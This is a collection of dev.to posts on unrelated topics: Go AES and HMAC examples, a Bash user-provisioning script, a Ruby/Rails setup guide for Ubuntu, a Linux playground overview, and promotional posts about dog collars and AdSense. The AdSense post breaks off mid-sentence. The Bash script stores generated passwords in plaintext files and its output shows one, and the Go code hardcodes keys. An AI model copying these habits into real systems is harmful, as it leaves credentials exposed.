JavaScript, Python, etc. **SOLID** provides a foundational framework that helps developers build source code that is easy to understand, flexible, easily extendable, enhances system maintainability, and minimizes the risk of issues. **_If you have any suggestions or questions regarding the content of the article, please don't hesitate to leave a comment below!_** **_If you found this content helpful, please visit [the original article on my blog](https://howtodevez.blogspot.com/2024/04/explanation-of-solid-in-oop.html) to support the author and explore more interesting content._** <a href="https://howtodevez.blogspot.com/2024/03/sitemap.html" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Blogger-FF5722?style=for-the-badge&logo=blogger&logoColor=white" width="36" height="36" alt="Blogspot" /></a><a href="https://dev.to/chauhoangminhnguyen" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/dev.to-0A0A0A?style=for-the-badge&logo=dev.to&logoColor=white" width="36" height="36" alt="Dev.to" /></a><a href="https://www.facebook.com/profile.php?id=61557154776384" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Facebook-1877F2?style=for-the-badge&logo=facebook&logoColor=white" width="36" height="36" alt="Facebook" /></a><a href="https://x.com/DavidNguyenSE" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/X-000000?style=for-the-badge&logo=x&logoColor=white" width="36" height="36" alt="X" /></a>
chauhoangminhnguyen
1,912,177
Implementasi Metode Standard Symmetric Encryption Signature pada Golang
Apa Itu Metode Standard Symmetric Encryption Signature? Jadi, gini, metode ini adalah...
0
2024-07-05T03:39:08
https://dev.to/yogameleniawan/implementasi-metode-standard-symmetric-encryption-signature-pada-golang-2m5m
go
![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xib7ktvnbrqfcl87y7eg.png) ### Apa Itu Metode Standard Symmetric Encryption Signature? Jadi, gini, metode ini adalah cara untuk mengenkripsi data biar aman dan nggak bisa dibaca sama orang yang nggak punya kunci dekripsinya. Bayangin aja temen-temen punya diary yang temen-temen kunci pake gembok. Hanya orang yang punya kuncinya yang bisa buka dan baca diary temen-temen. #### Symmetric Encryption Symmetric encryption ini kayak temen-temen dan temennya temen-temen eh ini apa si wkwkwk intinya gitu, punya satu kunci yang sama buat buka gembok. Kunci ini dipake buat enkripsi (mengunci) dan dekripsi (membuka) data. Jadi, baik temen-temen maupun temennya temen-temen bisa mengunci dan membuka data yang sama asalkan kalian punya kuncinya. #### Signature Signature di sini bukan tanda tangan fisik, tapi lebih ke tanda tangan digital. Tanda tangan ini memastikan bahwa data yang dikirim beneran dari temen-temen dan nggak ada yang mengubah data di tengah jalan. Jadi, temen-temen bisa yakin data yang temen-temen terima asli dari sumbernya dan nggak diutak-atik. ### Kenapa Harus Pakai Metode Ini? - Keamanan Data: Pastinya temen-temen mau datanya aman dari tangan-tangan jahil, kan? Dengan symmetric encryption, data temen-temen terenkripsi dan cuma bisa dibuka sama orang yang punya kuncinya. - Integritas Data: Dengan signature, temen-temen bisa pastikan data yang temen-temen terima atau kirim itu asli dan nggak diubah-ubah. Jadi, temen-temen nggak perlu khawatir ada yang curang. - Efisiensi: Symmetric encryption biasanya lebih cepat dibanding [Asymmetric Encryption](https://yogameleniawan.com/learning-media/mengenal-asymmetric-encryption-keamanan-data-tingkat-tinggi-dengan-golang-4b17) karena proses enkripsi dan dekripsinya lebih sederhana. ### Contoh Penggunaan di Golang Sekarang kita liat gimana cara pake metode ini di Golang. #### Symmetric Encryption di Golang ```go package main import ( "crypto/aes" "crypto/cipher" "crypto/rand" "encoding/hex" "fmt" "io" ) func encrypt(key, text []byte) (string, error) { block, err := aes.NewCipher(key) if err != nil { return "", err } ciphertext := make([]byte, aes.BlockSize+len(text)) iv := ciphertext[:aes.BlockSize] if _, err := io.ReadFull(rand.Reader, iv); err != nil { return "", err } stream := cipher.NewCFBEncrypter(block, iv) stream.XORKeyStream(ciphertext[aes.BlockSize:], text) return fmt.Sprintf("%x", ciphertext), nil } func decrypt(key []byte, cryptoText string) (string, error) { ciphertext, _ := hex.DecodeString(cryptoText) block, err := aes.NewCipher(key) if err != nil { return "", err } if len(ciphertext) < aes.BlockSize { return "", fmt.Errorf("ciphertext too short") } iv := ciphertext[:aes.BlockSize] ciphertext = ciphertext[aes.BlockSize:] stream := cipher.NewCFBDecrypter(block, iv) stream.XORKeyStream(ciphertext, ciphertext) return string(ciphertext), nil } func main() { key := []byte("the-key-has-to-be-32-bytes-long!") plaintext := "hello, world!" ciphertext, err := encrypt(key, []byte(plaintext)) if err != nil { fmt.Println("Error encrypting:", err) return } fmt.Printf("Encrypted: %s\n", ciphertext) decryptedText, err := decrypt(key, ciphertext) if err != nil { fmt.Println("Error decrypting:", err) return } fmt.Printf("Decrypted: %s\n", decryptedText) } ``` #### Signature Golang ```go package main import ( "crypto/hmac" "crypto/sha256" "encoding/hex" "fmt" ) func createHMAC(key, message []byte) string { mac := hmac.New(sha256.New, key) mac.Write(message) return hex.EncodeToString(mac.Sum(nil)) } func verifyHMAC(key, message []byte, signature string) bool { expectedMAC := createHMAC(key, message) return hmac.Equal([]byte(expectedMAC), []byte(signature)) } func main() { key := []byte("my-secret-key") message := []byte("important message") signature := createHMAC(key, message) fmt.Printf("Signature: %s\n", signature) isValid := verifyHMAC(key, message, signature) fmt.Printf("Is valid: %t\n", isValid) } ``` Jadi Metode Standard Symmetric Encryption Signature ini penting buat ngejaga keamanan dan integritas data temen-temen. Dengan symmetric encryption, temen-temen bisa enkripsi data biar aman, dan dengan signature, temen-temen bisa pastiin data yang temen-temen terima atau kirim itu asli dan nggak diubah-ubah. Jadi, pastikan temen-temen pake metode ini buat segala macam keperluan yang butuh keamanan tinggi. Sumber: - [HMAC Go](https://pkg.go.dev/crypto/hmac) - [SHA256](https://pkg.go.dev/crypto/sha256)
yogameleniawan
1,912,176
Creating and Managing Users and Groups on Linux with Bash Scripts: An Efficient Guide 🚀🐧
Welcome to Linux user management! In a growing organization, manually managing user accounts and...
0
2024-07-05T03:38:01
https://dev.to/adeshile_osunkoya_4201f36/creating-and-managing-users-and-groups-on-linux-with-bash-scripts-an-efficient-guide-2pog
devops, cloudcomputing, ubuntu, bash
Welcome to Linux user management! In a growing organization, manually managing user accounts and groups can quickly become tedious and error-prone. To streamline this process and maintain security and productivity, automation is key. 🛠️💪 With a Bash script, you can automate the repetitive tasks of creating and managing users and groups, ensuring consistency and efficiency while saving countless hours and reducing the risk of errors. In this article, we’ll show you how to create a script to automate the user and group creation process—a common task for any SysOps engineer. Let's dive in and simplify your workflow! 🌟 ## **Prerequisites** 1. Linux or Ubuntu running on either VM (Virtual box), Docker, AWS Ec2 instance. 2. Basic knowledge of Linux commands and Bash scripting. 3. Root privileges to execute the script. 4. Basic understanding of shell scripting and user management in Linux **Step 1: Create user file** Create a `.txt `file where your users will be listed and the groups they should be added to. A simple and easy to read file will be recommended. For this article , a sample file `user.txt` has been created and will be formatted as `user;groups` Example ``` Gabriel;sudo,dev,www-data Sultan;sudo Chelsea;dev,www-data ``` The first line in the example above `Gabriel` is the user and groups are `sudo, dev, www-data`. **Step 2: Create script file** Open your code editor and create a file e.g `create_users.sh`, this can also be created in your root directory using your terminal by running: ``` touch create_users.sh ``` _NB: The script file created will handle the logic of the user and group in_ **Step 1** **Step 3: Script implementation** First we need to check the administrative priviledge of the script user. Check if the first argument is passed: - The script begins with a shebang line and a check for root privileges to ensure the necessary permissions for user and group management. ``` #!/bin/bash if (( "$UID != 0" )) then echo "Error: script requires root privilege" exit 1 fi ``` **Shebang (#!/bin/bash)**: Indicates that the script should be run in the Bash shell. **Root Privileges Check**: Verifies if the script is executed by the root user. If not, it prints an error and exits. Then , the script processes input arguments and checks for the presence and type of the file `(text/plain)` containing user data. ``` # Save all arguments in an array ARGS=("$@") # Check whether no arguments are supplied if [ "$#" -eq 0 ]; then echo "No arguments supplied" exit 1 fi # Define a variable for the file FILE=${ARGS[0]} # Check if the file exists if [ ! -f "$FILE" ]; then echo "Error: File $FILE does not exist." exit 1 fi # Get the MIME type and check if it is text/plain file_type=$(file -b --mime-type "$FILE") if [[ "$file_type" != "text/plain" ]]; then echo "Error: required file type is not text/plain" exit 1 fi ``` **Argument Handling**: Captures script arguments and checks if any are provided. **File Existence Check**: Verifies if the specified file exists. **MIME Type Check**: Ensures the file is a plain text file. **Logging and Data Writing Functions** I used this function below to log all actions by logging all user actions into `/var/log/user_management.log` ``` # Logging and writing data log() { sudo printf "$*\n" >> $log_path } # Function to save user data user_data() { sudo printf "$1,$2\n" >> $3 } ``` **Generate Random Passwords** `genpasswd` function is used to generate a secure random password of specified length (default 16 characters)for the user. ``` genpasswd() { local l=$1 [ "$l" == "" ] && l=16 tr -dc A-Za-z0-9_ < /dev/urandom | head -c ${l} | xargs } ``` **Process Each Line in the users.txt file:** The below code block will read each line of `users.txt` file and get the `username` and `user groups `. ``` # Create user function create_user(){ username="$1" password=$(genpasswd) # If username exists, do nothing if [ ! $(cat /etc/passwd | grep -w $username) ]; then # User is created with a group as their name sudo useradd -m -s /bin/bash $username # Set the user's password echo "$username:$password" | sudo chpasswd msg="User '$username' created with the password '********'" echo $msg log $msg # Save user data dir=/home/$username/$user_pass create_file_directory $dir user_data $username $password $dir # Set file group to user and give read only access sudo chgrp $username $dir sudo chmod 640 $dir fi } create_group() { # Create group # If group exists, do nothing if [ ! $(cat /etc/group | grep -w $1) ]; then sudo groupadd $1 msg="Group created '$1'" echo $msg log $msg fi } # Add user to group add_user_to_group() { sudo usermod -aG $2 $1 msg="'$1' added to '$2'" echo $msg log $msg } ``` The code block above contains the following functions: `create_user Function`: Creates a user with a home directory and sets the password. `create_group Function`: Creates a group if it doesn’t already exist. `add_user_to_group Function`: Adds a user to a specified group. The user and password is created and then the details are then stored in the user directory using the below path: `[user home directory]/var/secure/user_passwords.txt` The user data reads file and creates users and groups accordingly. ``` # Read the FILE while IFS= read -r line || [ -n "$line" ]; do username=$(printf "%s" "$line" | cut -d ';' -f 1) echo "----- Process started for: '$username' -----" create_user $username usergroups=$(printf "%s" "$line" | cut -d ';' -f 2) for group in ${usergroups//,/ } ; do create_group $group add_user_to_group $username $group done echo "----- Process Done with '$username' -----" done < $FILE ``` **Step 4: Run script file** It's time to test our script to ensure that our code is working. Run the `.txt` file by using the command below on your terminal. ``` bash create_users.sh users.txt ``` The below result should be displayed: ``` File and path created: /var/log/user_management.log ----- Process started for: 'Gabriel' ----- User 'Gabriel' created with the password '********' File and path created: /home/Gabriel/var/secure/user_passwords.txt 'Gabriel' added to 'sudo' 'Gabriel' added to 'dev' 'Gabriel' added to 'www-data' ----- Process Done with 'Gabriel' ----- ----- Process started for: 'Sultan' ----- User 'Sultan' created with the password '********' File and path created: /home/Sultan/var/secure/user_passwords.txt 'Sultan' added to 'sudo' ----- Process Done with 'Sultan' ----- ----- Process started for: 'Chelsea' ----- User 'Chelsea' created with the password '********' File and path created: /home/Chelsea/var/secure/user_passwords.txt 'Chelsea' added to 'dev' 'Chelsea' added to 'www-data' ----- Process Done with 'Chelsea' ----- root@32cb601ed360:~# cat /home/Gabriel/var/secure/user_passwords.txt Gabriel,yDEoSe1RfzIwxmhk root@32cb601ed360:~# bash create.users.sh users.txt File and path created: /var/log/user_management.log ----- Process started for: 'Gabriel' ----- 'Gabriel' added to 'sudo' 'Gabriel' added to 'dev' 'Gabriel' added to 'www-data' ----- Process Done with 'Gabriel' ----- ----- Process started for: 'Sultan' ----- 'Sultan' added to 'sudo' ----- Process Done with 'Sultan' ----- ----- Process started for: 'Chelsea' ----- 'Chelsea' added to 'dev' 'Chelsea' added to 'www-data' ----- Process Done with 'Chelsea' ----- ``` **To see all groups created run:** ``` sudo cat /etc/group ``` **To see all users and groups they belong run:** ``` sudo cat /etc/passwd ``` My full code implementation can be found on Github: [Creating and Managing Users](https://github.com/Adeshile2/user-manage-bash) **HNG Internships** For more information about the HNG Internship, visit [HNG Internship (https://hng.tech/internship) and if you want to hire world class freelancers and developers , check: [HNG Hire](hng.tech/hire). Thanks for reading through please do ensure to leave feedback so as to better serve my reader 😊 **Conclusion** This Bash script automates the process of creating and managing users and groups on a Linux system, making it easier to maintain consistency and security across your user base. By following this guide, you can efficiently manage user accounts and group memberships with minimal manual effort.
adeshile_osunkoya_4201f36
1,912,175
Setup para Ruby / Rails: Ubuntu
Este artigo descreve como configurar um ambiente de desenvolvimento Ruby / Rails no Ubuntu. Ele...
27,960
2024-07-05T03:36:24
https://dev.to/serradura/setup-para-ruby-rails-ubuntu-2ip8
beginners, ruby, rails, braziliandevs
Este artigo descreve como configurar um ambiente de desenvolvimento Ruby / Rails no Ubuntu. Ele inclui a instalação do Visual Studio Code, Asdf, Ruby, NodeJS, SQLite, Rails e Ruby LSP (plugin para o VSCode). Para seguir este tutorial, basta copiar e colar os comandos no terminal. Caso encontre algum problema, deixe um comentário que eu tentarei te ajudar. 😊 Se preferir, você pode acessar o [vídeo no YouTube](https://www.youtube.com/watch?v=GFyrnaNKwdQ) onde mostro o passo a passo de como configurar o ambiente. {% embed https://www.youtube.com/watch?v=GFyrnaNKwdQ %} ## Instalação do Visual Studio Code Visual Studio Code é um editor de código-fonte gratuito desenvolvido pela Microsoft para Windows, Linux e macOS. Os comandos abaixo, baixam e instalam o Visual Studio Code no Ubuntu. Além disso, o editor será configurado como o padrão do terminal. ```shell # Atualize a lista de pacotes com as versões mais recentes sudo apt update # Instale wget para baixar o Visual Studio Code sudo apt install -y wget # Baixe o Visual Studio Code na pasta Downloads ## -- https://code.visualstudio.com/download wget https://code.visualstudio.com/sha/download\?build\=stable\&os\=linux-deb-x64 -O ~/Downloads/code.deb # Instale o Visual Studio Code sudo dpkg -i ~/Downloads/code.deb # Adicione o Visual Studio Code como editor padrão do terminal echo 'export EDITOR="code --wait"' >> ~/.bashrc ``` ## Instalação do Asdf asdf é um gerenciador de ferramentas e suas diferentes versões. Ele permite instalar, gerenciar e alternar entre várias versões de Ruby, NodeJS, dentre outros programas e linguagens de programação. Execute os comandos abaixo para fazer a sua instalação. ```sh # Instale o Git e o Curl sudo apt install -y curl git # Instale o asdf # -- https://asdf-vm.com/guide/getting-started.html#_2-download-asdf git clone https://github.com/asdf-vm/asdf.git ~/.asdf --branch v0.14.0 # Configure o asdf para inicializar no terminal echo '. "$HOME/.asdf/asdf.sh"' >> ~/.bashrc # Configure o autocomplete do asdf echo '. "$HOME/.asdf/completions/asdf.bash"' >> ~/.bashrc # Recarregue o terminal . ~/.bashrc ``` ## Instalação do Ruby Ruby é a linguagem de programação utilizada no framework Ruby on Rails. Os comandos abaixo instalam a última versão do Ruby e a definem como a padrão do sistema. ```sh # Instale as dependências de compilação # -- https://github.com/rbenv/ruby-build/wiki#ubuntudebianmint sudo apt install -y autoconf patch build-essential rustc libssl-dev libyaml-dev libreadline6-dev zlib1g-dev libgmp-dev libncurses5-dev libffi-dev libgdbm6 libgdbm-dev libdb-dev uuid-dev # Adicione o plugin ao asdf asdf plugin add ruby # Instale a última versão asdf install ruby latest:3 ``` Após a instalação, execute os comandos abaixo para definir a versão padrão do Ruby e atualizar o RubyGems (gerenciador de bibliotecas do Ruby). ```sh # Verifique a versão que foi instalada asdf list ruby # Deverá aparecer algo como: # 3.3.3 # Defina essa versão como a padrão do sistema asdf global ruby 3.3.3 # Atualize o RubyGems gem update --system # Verifique a versão padrão ruby -v ``` ## Instalação do NodeJS NodeJS é uma plataforma de desenvolvimento de aplicações em JavaScript. O node (ou nodejs) é utilizado pelo Rails para compilar assets (como CSS e JavaScript). Os comandos abaixo instalam a última versão e a definem como a padrão do sistema. ```ruby # Instale as dependências de compilação # -- https://github.com/nodejs/node/blob/main/BUILDING.md#building-nodejs-on-supported-platforms sudo apt install -y python3 g++ make python3-pip # Adicione o plugin ao asdf asdf plugin add nodejs # Instale a última versão asdf install nodejs latest # Verifique a versão que foi instalada asdf list nodejs # Deverá aparecer algo como: # 22.3.0 # Defina essa versão como a padrão do sistema asdf global nodejs 22.3.0 # Faça a instalação do yarn npm install -g yarn # Verifique a versão padrão node -v ``` ## Instalação do SQLite SQLite é um banco de dados SQL embutido. Ou seja, ele é um banco de dados que não requer um servidor separado já que tudo é armazenado em um único arquivo. ```sh sudo apt install -y sqlite3 ``` ## Instalação do Ruby LSP no Visual Studio Code O Ruby LSP é um plugin para VSCode que fornece recursos como autocompletar, formatação dentre outros, tanto para Ruby quanto para Rails. ```sh # Instale a gem do Ruby LSP gem install ruby-lsp # Instale a extensão do Ruby LSP no Visual Studio Code code --install-extension shopify.ruby-lsp ``` ## Instalação do Rails ```sh gem install rails # Verifique a versão que foi instalada rails -v ``` ## Criando um projeto Rails Visando testar a instalação do Ruby e do Rails, vamos criar um projeto para verificar se tudo está funcionando. ```sh # Vá para o diretório home cd ~ # Crie uma pasta para organizar seus projetos mkdir Workspace # Entre na pasta cd Workspace # Crie um novo projeto Rails # O banco de dados padrão é o SQLite rails new myapp # Acesse a pasta do projeto cd myapp # Crie o banco de dados bin/rails db:create # Inicie o servidor bin/rails s ``` Abra outra aba no terminal e execute o comando para acessar a aplicação no navegador: ```sh open http://localhost:3000 ``` ### Criando um gerenciador de contatos ```sh # Crie um scaffold para a entidade Person bin/rails g scaffold Person first_name last_name email birthdate:date # Execute as migrações para criar a tabela no banco de dados bin/rails db:migrate # Inicie o servidor (caso não esteja rodando) # bin/rails s # Acesse o gerenciador de contatos no navegador open http://localhost:3000/people ``` Navegue pelo sistema e teste as funcionalidades de listagem, cadastro, visualização, edição e exclusão de contatos. ### Melhorando a aparência da aplicação Visando melhorar o visual do sistema, vamos adicionar o Pico CSS versão class-less, que como o nome sugere não faz uso classes CSS. Ou seja, basta adicionar as tags HTML para obter um estilo bonito e padronizado. ```sh # Dentro da pasta do projeto cd ~/Workspace/myapp # Abra o VSCode code . ``` Dentro do VSCode, abra o arquivo `app/views/layouts/application.html.erb` (utilize o `Ctrl` + `p` para buscar o arquivo) e adicione o seguinte trecho de código dentro da tag.`<head>`: ```html <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@picocss/pico@2/css/pico.classless.min.css" /> ``` Nesse mesmo arquivo, envolva o conteúdo da tag `<body>` com uma tag `<main>`: ```html <body> <main><%= yield %></main> </body> ``` Após essas alterações, acesse o navegador e recarregue para ver o novo visual de todas as páginas do sistema. ### Adicionando validações ao modelo Person Embora funcional, o gerenciador de cadastro não possui validações. Vamos adicionar algumas para garantir que os dados informados sejam válidos. Através do VSCode, abra o arquivo `app/models/person.rb` (utilize o `Ctrl` + `p` para buscar o arquivo) e adicione as validações: ```ruby validates :first_name, :last_name, presence: true validates :email, format: /@/, allow_blank: true ``` Volte o navegador e tente cadastrar/editar uma pessoa sem informar o nome ou o e-mail (sem `@`). ## Conclusão Viu como foi simples configurar um ambiente de desenvolvimento Ruby / Rails no Ubuntu? Curtiu, então acesse as referências abaixo para obter mais informações sobre cada um dos programas e linguagens utilizadas. Você sente dificuldades com inglês? Acesse esse outro post para aprender [como traduzir conteúdos técnicos de forma prática através do Google Translator](https://serradura.github.io/pt-BR/blog/traduzindo_conteudo_tecnico_com_google_translator/). Gostou do conteúdo? Tem outra dica? Então deixe seu comentário aqui embaixo. Valeu! 😉 > **Nota**: Este artigo foi escrito com base no Ubuntu 22.04. Caso você esteja utilizando outra versão, os comandos podem não funcionar corretamente. Caso encontre algum problema, deixe um comentário que eu tentarei te ajudar. 😊 ## Referências: A lista abaixo contém os sites de referência utilizados para a criação deste documento. Ela segue a ordem de aparição no post. - [Visual Studio Code](https://code.visualstudio.com/) - [Asdf](https://asdf-vm.com/guide/getting-started.html) - [Ruby](https://www.ruby-lang.org/en/) ([Versões](https://www.ruby-lang.org/en/downloads/releases/)) - [NodeJS](https://nodejs.org/en/) - ([Versões](https://nodejs.org/en/download/releases/)) - [SQLite](https://www.sqlite.org/index.html) - [Ruby LSP](https://marketplace.visualstudio.com/items?itemName=Shopify.ruby-lsp) - [Ruby on Rails](https://rubyonrails.org/) - ([Getting Started](https://guides.rubyonrails.org/getting_started.html)) - [Pico CSS](https://picocss.com/) --- Já ouviu falar do **ada.rb - Arquitetura e Design de Aplicações em Ruby**? É um grupo focado em práticas de engenharia de software com Ruby. Acesse o <a href="https://t.me/ruby_arch_design_br" target="_blank">canal no telegram</a> e junte-se a nós em nossos <a href="https://meetup.com/pt-BR/arquitetura-e-design-de-aplicacoes-ruby/" target="_blank">meetups</a> 100% on-line. ---
serradura
1,912,174
Enhance Your Pup's Style with a Tweed Dog Collar from Happy Dogs Togs
Are you looking to add a touch of elegance to your furry friend's wardrobe? Consider a tweed dog...
0
2024-07-05T03:34:33
https://dev.to/ericryan3132/enhance-your-pups-style-with-a-tweed-dog-collar-from-happy-dogs-togs-3g86
Are you looking to add a touch of elegance to your furry friend's wardrobe? Consider a [tweed dog collar](https://happydogstogs.com/collections/medium-harris-tweed-dog-collars) from Happy Dogs Togs! Tweed collars are not only stylish but also durable, making them a perfect choice for both fashion-conscious pet owners and those seeking long-lasting quality. Here's why a tweed dog collar might be the perfect accessory for your beloved canine companion. **Introduction to Tweed Dog Collars** Tweed dog collars offer a unique blend of sophistication and durability, inspired by classic British craftsmanship. They are crafted from high-quality tweed fabric, known for its resilience and timeless appeal. Whether you're walking through city streets or countryside trails, a tweed collar ensures your dog stands out with style and comfort. **Benefits of Tweed Collars** One of the key advantages of tweed dog collars is their durability. Designed to withstand daily wear and tear, they are ideal for active dogs who enjoy outdoor adventures. Additionally, tweed fabric is breathable, making it comfortable for your pet in all seasons. It's also easy to maintain, often requiring just a quick wipe-down to keep it looking pristine. **Style and Variety** At Happy Dogs Togs, you'll find a wide range of tweed collars to suit every dog's personality and size. From traditional earth tones to vibrant patterns, there's a collar to match every owner's taste and dog's unique character. Whether you prefer a classic houndstooth or a more contemporary checkered design, our collection ensures your pup looks effortlessly stylish. **Comfort and Functionality** Beyond style, tweed collars prioritize comfort and functionality. They are designed with your dog's comfort in mind, featuring soft inner linings and sturdy buckles for secure fastening. This ensures that your pet stays safe and comfortable during walks, training sessions, or playtime in the park. **Visit Happy Dogs Togs Today** Ready to upgrade your dog's wardrobe? Explore the exquisite collection of tweed dog collars at Happy Dogs Togs today. Whether you're treating your own dog or searching for the perfect gift for a fellow pet lover, our collars promise both style and durability. Visit our website to browse our full range and find the perfect tweed collar that complements your dog's personality and lifestyle.
ericryan3132
1,912,172
Online Linux Playground | Practice Linux Commands Online
Explore and experiment with Linux in a secure, cloud-based environment. Discover the power of Linux with our Online Linux Playground.
27,674
2024-07-05T03:23:31
https://labex.io/tutorials/linux-online-linux-playground-372915
linux, coding, programming, tutorial
## Introduction ![MindMap](https://internal-api-drive-stream.feishu.cn/space/api/box/stream/download/authcode/?code=OThlNmI3OWI4MzI2N2JjZWIwYmM1YmUwZThjMzgwYzNfOTMxNjJiMDIwZDYwOTBhNzQwNGQ0OWIzOTZlNTVlZWNfSUQ6NzM4Nzk4NzA4OTkzNjAwNzE3MV8xNzIwMTQ5ODEwOjE3MjAyMzYyMTBfVjM) This article covers the following tech skills: ![Skills Graph](https://pub-a9174e0db46b4ca9bcddfa593141f230.r2.dev/linux-online-linux-playground-372915.jpg) The LabEx Linux Playground is an online environment that allows users to quickly experience various Linux-related technologies. It provides a sandbox-like environment where users can explore and experiment with Linux without the need to set up a local machine. ## How to Use the Linux Playground The Linux Playground in LabEx runs on the Ubuntu 22.04 operating system. To get started, you can create a "Hello World" project to familiarize yourself with the Linux Playground experience. The LabEx Linux Playground offers three different user interfaces: 1. **VS Code**: Users can access the Linux environment through a web-based Visual Studio Code interface, allowing them to write, compile, and run code directly in the browser. 2. **Desktop**: The Linux Playground also provides a full-fledged desktop environment, similar to a traditional Linux desktop, where users can explore the file system, run commands, and use various applications. 3. **Web Terminal**: In addition to the graphical interfaces, the Linux Playground offers a web-based terminal, enabling users to interact with the Linux system using command-line tools and utilities. To create a "Hello World" project in the Linux Playground: 1. Choose your preferred user interface (VS Code, Desktop, or Web Terminal). 2. Open a text editor or the terminal and create a new file named "hello.c". 3. Inside the file, write the following "Hello World" program: ```c #include <stdio.h> int main() { printf("Hello, World!\n"); return 0; } ``` 4. Compile the program using the gcc compiler: `gcc hello.c -o hello`. 5. Run the compiled program: `./hello`. You should see the output "Hello, World!" displayed in the terminal or console. ![Linux Playground](https://file.labex.io/namespace/df87b950-1f37-4316-bc07-6537a1f2c481/playground/lab-linux-playground/assets/20240617-16-26-16-SNpkhTcO.png) ## Linux Skill Tree on LabEx The [Linux Skill Tree on LabEx](https://labex.io/skilltrees/linux) covers a wide range of essential Linux skills, organized into several skill groups. Here's a detailed overview: ### Basics Fundamental Linux concepts and commands: - **Navigation**: Basic commands for moving around the file system (e.g., `cd`, `ls`, `pwd`). - **File Management**: Commands for creating, copying, moving, and deleting files and directories (e.g., `touch`, `cp`, `mv`, `rm`, `mkdir`). - **Text Editing**: Using text editors like Vim or Nano to edit files. - **User Management**: Adding, modifying, and deleting user accounts. - **Permissions**: Understanding and managing file and directory permissions. - **Process Management**: Monitoring and controlling running processes (e.g., `ps`, `top`, `kill`). ### Shell Scripting Automating tasks with shell scripts: - **Bash Scripting**: Writing and executing Bash shell scripts. - **Variables and Input**: Handling variables and user input in scripts. - **Control Structures**: Implementing conditional statements and loops. - **Functions**: Defining and calling reusable script functions. - **Scripting Best Practices**: Organizing and optimizing shell scripts. ### System Administration Tools and techniques for managing Linux systems: - **Package Management**: Installing, updating, and removing software packages (e.g., `apt`, `yum`, `dnf`). - **System Services**: Starting, stopping, and managing system services (e.g., `systemctl`, `init`). - **System Monitoring**: Monitoring system performance and resource utilization (e.g., `top`, `htop`, `sar`). - **Networking**: Configuring network interfaces and troubleshooting network issues. - **Backup and Restoration**: Implementing backup strategies and restoring data. - **Security**: Securing Linux systems, including user authentication and firewall configuration. ### Advanced Linux Specialized Linux skills and concepts: - **Shell Customization**: Personalizing the shell environment (e.g., `.bashrc`, aliases, functions). - **Linux Kernel**: Understanding the Linux kernel and its modules. - **Virtualization**: Setting up and managing virtual machines using tools like VirtualBox or KVM. - **Containerization**: Building and running Docker containers. - **Scripting Languages**: Utilizing scripting languages like Python or Perl for automation. - **Linux Distributions**: Exploring different Linux distributions and their unique features. ### Hands-on Labs Practical, interactive labs to reinforce your Linux skills: - **Lab Exercises**: Guided, step-by-step labs covering various Linux topics. - **Challenges**: Open-ended problems to test your problem-solving abilities. - **Projects**: Comprehensive projects to apply your Linux knowledge. For more detailed information and to start your Linux learning journey, visit the [Linux Skill Tree](https://labex.io/skilltrees/linux) on LabEx. ## Linux Playground FAQ ### What are the advantages of using Linux over other operating systems? Linux offers a high degree of customization, security, and stability, making it a popular choice for servers, embedded systems, and power users. Its open-source nature allows for extensive community support and a vast ecosystem of tools and applications. ### Why use an Online Linux Playground? An online Linux Playground provides a hassle-free way to explore and experiment with Linux without the need to set up a local Linux environment. It offers a ready-to-use platform to practice Linux commands, develop scripts, and test applications. ### How does the LabEx Linux Playground differ from other online Linux environments? The LabEx Linux Playground provides a comprehensive online lab environment with multiple interfaces (VS Code, Desktop, Web Terminal). It supports full-fledged development, including building and running Linux-based projects, as well as access to a wide range of Linux distributions and tools. ### Can I use the Linux Playground for professional development? Yes, the Linux Playground is equipped with professional-grade tools and environments, enabling you to work on complex Linux-based projects online, from system administration to software development. ### Is the Linux Playground suitable for beginners? Absolutely! The Linux Playground is designed to cater to both beginners and advanced users, offering an intuitive interface and comprehensive resources for learning and practicing Linux commands, scripting, and system administration. ## Summary The LabEx Linux Playground provides a convenient and accessible way for users to explore and experiment with Linux without the need to set up a local environment. With its three user interface options (VS Code, Desktop, and Web Terminal), users can choose the most suitable way to interact with the Linux system and quickly get started with various Linux-related tasks and projects. --- ## Want to learn more? - 🚀 Practice [Online Linux Playground](https://labex.io/tutorials/linux-online-linux-playground-372915) - 🌳 Learn the latest [Linux Skill Trees](https://labex.io/skilltrees/linux) - 📖 Read More [Linux Tutorials](https://labex.io/tutorials/category/linux) Join our [Discord](https://discord.gg/J6k3u69nU6) or tweet us [@WeAreLabEx](https://twitter.com/WeAreLabEx) ! 😄
labby
1,912,165
How to Get Google AdSense Approval: Tips, Tricks, and The Almighty Eligibility Checker
Ever wondered why Google AdSense seems harder to get into than an exclusive club in Miami? Well,...
0
2024-07-05T03:17:12
https://dev.to/developerbishwas/how-to-get-google-adsense-approval-tips-tricks-and-the-almighty-eligibility-checker-8kb
webdev, adsense, blogging
Ever wondered why Google AdSense seems harder to get into than an exclusive club in Miami? Well, folks, you're in luck! I'm going to spill the beans on how to get that coveted AdSense approval and introduce you to a lifesaving tool: [Adsense Eligibility Checker](https://webmatrices.com/adsense-eligibility-checker). ## The 101 on AdSense Approval First off, if you think AdSense approval is just about slapping some content onto a page and waiting for the money to roll in, you're in for a wake-up call. Google has a pretty strict checklist, and boy, do they stick to it! Here’s what you need to know: 1. **Quality Content**: Content is king, people! Google loves quality content that's unique, engaging, and useful. Posting about your cat's daily activities in excruciating detail? Maybe rethink that. 2. **Essential Pages**: Google wants to know you're serious. Make sure you have an "About Us," "Privacy Policy," "Contact Us," and "Terms of Service" page. 3. **Domain Age**: Your website should ideally be at least 6 months old. Google loves mature websites—kinda like how wine gets better with age. 4. **Website Traffic**: ‘No traffic, no money’ is the new ‘No pain, no gain’. Ensure you have steady traffic coming to your site. 5. **Mobile Friendly**: With almost everyone glued to their smartphones, it’s crucial your website is mobile-friendly. If it isn’t, you’re essentially toast. 6. **HTTPS**: Google is serious about security. If your website is still running on HTTP, it’s time to upgrade. It’s like wearing a helmet when you go biking—just do it! 7. **Good Website Speed**: Slow and steady doesn’t win the race here. Google wants fast-loading websites. Aim to get your pages loading in under 3 seconds. ## Introducing the Adsense Eligibility Checker Let’s face it, remembering all these criteria can feel like juggling flaming torches while balancing on a unicycle. This is where the [Adsense Eligibility Checker](https://webmatrices.com/adsense-eligibility-checker) comes into play. It’s like having a mini Sherlock Holmes analyze your 